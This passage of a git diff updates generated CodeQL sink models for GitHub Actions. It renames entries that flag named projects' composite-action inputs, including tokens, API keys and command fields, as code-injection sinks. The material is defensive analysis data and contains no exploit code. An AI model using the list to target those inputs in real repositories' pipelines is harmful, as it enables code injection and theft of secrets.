githubsecuritylab/actions-all extensible: sinkModel data: - - ["broadinstitute/gatk", "*", "inputs.identifier", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.repo-path", "code-injection", "generated"] - - ["broadinstitute/gatk", "*", "inputs.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml index 3a6a4575d304..9729f9668138 100644 --- a/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml +++ b/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["canonical/multipass", "*", "inputs.release-tag-re", "code-injection", "generated"] - - ["canonical/multipass", "*", "inputs.release-branch-re", "code-injection", "generated"] \ No newline at end of file + - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml index d21c609e5eda..92c259539443 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/actions", "*", "inputs.keypair_path", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.role_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.backend_name", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_url", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.ttl", "code-injection", "generated"] - - ["chia-network/actions", "*", "inputs.vault_token", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml index 76c92f51d267..c572c11ada4b 100644 --- a/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml +++ b/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chia-network/chia-blockchain", "*", "inputs.command-prefix", "code-injection", "generated"] \ No newline at end of file + - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml index dc48b2e8d20e..1819f4f716e1 100644 --- a/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chipsalliance/chisel", "*", "inputs.version", "code-injection", "generated"] - - ["chipsalliance/chisel", "*", "inputs.file-name", "code-injection", "generated"] \ No newline at end of file + - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml index b46b5592ac55..620100dd2d9a 100644 --- a/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml +++ b/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["chocobozzz/peertube", "*", "inputs.deployKey", "code-injection", "generated"] - - ["chocobozzz/peertube", "*", "inputs.knownHosts", "code-injection", "generated"] \ No newline at end of file + - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml index a38482ba6963..dfb08d260583 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium-cli", "*", "inputs.binary-name", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.binary-dir", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.ci-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.release-version", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.repository", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.go-mod-directory", "code-injection", "generated"] - - ["cilium/cilium-cli", "*", "inputs.local-path", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.local-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml index ca1bf2f894ff..a99ccc9e4776 100644 --- a/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml +++ b/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cilium/cilium", "*", "inputs.job-name", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.lb-acceleration", "code-injection", "generated"] - - ["cilium/cilium", "*", "inputs.mutual-auth", "code-injection", "generated"] \ No newline at end of file + - ["cilium/cilium", "*", "input.job-name", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.lb-acceleration", "code-injection", "generated"] + - ["cilium/cilium", "*", "input.mutual-auth", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml index 4a46ca788e57..3a1e7b9d3366 100644 --- a/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml +++ b/ql/lib/ext/generated/composite-actions/citusdata_citus.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["citusdata/citus", "*", "inputs.flags", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.pg_major", "code-injection", "generated"] - - ["citusdata/citus", "*", "inputs.count", "code-injection", "generated"] \ No newline at end of file + - ["citusdata/citus", "*", "input.flags", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.pg_major", "code-injection", "generated"] + - ["citusdata/citus", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml index b1c5270165b7..c15c1fac0068 100644 --- a/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml +++ b/ql/lib/ext/generated/composite-actions/clerk_javascript.model.yml 
@@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["clerk/javascript", "*", "inputs.auth-email", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-password", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.auth-user", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.registry", "code-injection", "generated"] - - ["clerk/javascript", "*", "inputs.publish-cmd", "code-injection", "generated"] \ No newline at end of file + - ["clerk/javascript", "*", "input.auth-email", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-password", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.auth-user", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.registry", "code-injection", "generated"] + - ["clerk/javascript", "*", "input.publish-cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml index 9fcaa3fff768..b0c787fa378f 100644 --- a/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloud-custodian/cloud-custodian", "*", "inputs.poetry-version", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.bucket-url", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.docs-dir", "code-injection", "generated"] - - ["cloud-custodian/cloud-custodian", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["cloud-custodian/cloud-custodian", "*", "input.poetry-version", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.bucket-url", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.docs-dir", "code-injection", "generated"] + - ["cloud-custodian/cloud-custodian", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml index f21c3c1f9de2..86278889fdf1 100644 --- a/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudflare/workers-sdk", "*", "inputs.package-manager", "code-injection", "generated"] \ No newline at end of file + - ["cloudflare/workers-sdk", "*", "input.package-manager", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml index 7ff68860cf83..4bf92a251235 100644 --- a/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml +++ b/ql/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cloudfoundry/cloud_controller/ng", "*", "inputs.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file + - ["cloudfoundry/cloud_controller/ng", "*", "input.BOSH_CLI_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml index 9e3d5bd41e32..79c13504faba 100644 --- a/ql/lib/ext/generated/composite-actions/coder_coder.model.yml +++ b/ql/lib/ext/generated/composite-actions/coder_coder.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coder/coder", "*", "inputs.api-key", "code-injection", "generated"] \ No newline at end of file + - ["coder/coder", "*", "input.api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml index 63373bd78a79..45ac61c8ef9d 100644 --- a/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml +++ b/ql/lib/ext/generated/composite-actions/coil-kt_coil.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coil-kt/coil", "*", "inputs.api-level", "code-injection", "generated"] \ No newline at end of file + - ["coil-kt/coil", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml index 529614b8d79d..ce546fceb4bb 100644 --- a/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml +++ b/ql/lib/ext/generated/composite-actions/commaai_openpilot.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["commaai/openpilot", "*", "inputs.sleep_time", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.docker_hub_pat", "code-injection", "generated"] - - ["commaai/openpilot", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["commaai/openpilot", "*", "input.sleep_time", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.docker_hub_pat", "code-injection", "generated"] + - ["commaai/openpilot", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml index ce3ce91d773a..b34c6d46da3a 100644 --- a/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml +++ b/ql/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["conan-io/conan-center-index", "*", "inputs.files", "code-injection", "generated"] - - ["conan-io/conan-center-index", "*", "inputs.reviewers", "code-injection", "generated"] \ No newline at end of file + - ["conan-io/conan-center-index", "*", "input.files", "code-injection", "generated"] + - ["conan-io/conan-center-index", "*", "input.reviewers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml index ececaa835e94..f87e0c02529c 100644 --- a/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml +++ b/ql/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["corretto/corretto-8", "*", "inputs.version-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.upstream", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.merge-branch", "code-injection", "generated"] - - ["corretto/corretto-8", "*", "inputs.local-branch", "code-injection", "generated"] \ No newline at end of file + - ["corretto/corretto-8", "*", "input.version-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.upstream", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.merge-branch", "code-injection", "generated"] + - ["corretto/corretto-8", "*", "input.local-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml index 0c19019e4f34..88348f05cd0d 100644 --- a/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cosmos/cosmos-sdk", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["cosmos/cosmos-sdk", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml index 67a21fc2e86f..76fe3bed4729 100644 --- a/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml +++ b/ql/lib/ext/generated/composite-actions/coturn_coturn.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["coturn/coturn", "*", "inputs.SUDO", "code-injection", "generated"] \ No newline at end of file + - ["coturn/coturn", "*", "input.SUDO", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml index 3f0c5e645de4..bf1a498d7a08 100644 --- a/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["crunchydata/postgres-operator", "*", "inputs.k3s-channel", "code-injection", "generated"] \ No newline at end of file + - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 470109b5e857..b985d87f7e19 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml 
@@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["cvc5/cvc5", "*", "inputs.build-dir", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.macos-target", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-examples", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-python-bindings", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.check-install", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.regressions-exclude", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.strip-bin", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-config", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.configure-env", "code-injection", "generated"] - - ["cvc5/cvc5", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file + - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.macos-target", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-examples", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-python-bindings", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.check-install", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.regressions-exclude", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.strip-bin", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-config", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.configure-env", "code-injection", "generated"] + - ["cvc5/cvc5", "*", "input.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 5ffefd58e53f..8e7cdd0308c9 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["d2l-ai/d2l-en", "*", "inputs.command", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.work-dir", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-name", "code-injection", "generated"] - - ["d2l-ai/d2l-en", "*", "inputs.job-type", "code-injection", "generated"] \ No newline at end of file + - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.work-dir", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-name", "code-injection", "generated"] + - ["d2l-ai/d2l-en", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 742e1876811b..cf30d0d19ccc 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml 
@@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.clean-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.deploy-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.wait-between-retries", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.retries-on-failure", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.check-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.build-command", "code-injection", "generated"] - - ["danysk/build-check-deploy-gradle-action", "*", "inputs.pre-build-command", "code-injection", "generated"] \ No newline at end of file + - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.deploy-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.wait-between-retries", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.retries-on-failure", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.check-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.build-command", "code-injection", "generated"] + - ["danysk/build-check-deploy-gradle-action", "*", "input.pre-build-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 97c75ae6f5c9..5414a755179c 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-dotnet", "*", "inputs.command", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.baseImage", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.aas_github_token", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.artifacts_path", "code-injection", "generated"] - - ["datadog/dd-trace-dotnet", "*", "inputs.github_token", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.baseImage", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.aas_github_token", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.artifacts_path", "code-injection", "generated"] + - ["datadog/dd-trace-dotnet", "*", "input.github_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index fa98e84315df..97a3bfa026e1 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-go", "*", "inputs.files", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.tags", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.service", "code-injection", "generated"] - - ["datadog/dd-trace-go", "*", "inputs.dd-api-key", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.tags", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.service", "code-injection", "generated"] + - ["datadog/dd-trace-go", "*", "input.dd-api-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 3bc48b644d00..81672e855578 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datadog/dd-trace-js", "*", "inputs.container-id", "code-injection", "generated"] - - ["datadog/dd-trace-js", "*", "inputs.init-image-version", "code-injection", "generated"] \ No newline at end of file + - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] + - ["datadog/dd-trace-js", "*", "input.init-image-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index 81e079430266..b4fdfaf273df 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml 
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["datafuselabs/databend", "*", "inputs.dataset", "code-injection", "generated"] - - ["datafuselabs/databend", "*", "inputs.dirs", "code-injection", "generated"] \ No newline at end of file + - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] + - ["datafuselabs/databend", "*", "input.dirs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index a1fdb476748e..6f1043073d8e 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["davatorium/rofi", "*", "inputs.logfile", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.windowmode", "code-injection", "generated"] - - ["davatorium/rofi", "*", "inputs.cc", "code-injection", "generated"] \ No newline at end of file + - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.windowmode", "code-injection", "generated"] + - ["davatorium/rofi", "*", "input.cc", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 5744f3e74956..f9244c448580 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml 
@@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["debezium/debezium", "*", "inputs.path-core", "code-injection", "generated"] \ No newline at end of file + - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 852e39799d93..36332c5678d4 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["defenseunicorns/zarf", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index a0d7eb51354e..c246e5de06f6 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "inputs.results_path", "code-injection", "generated"] \ No newline at end of file + - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file 
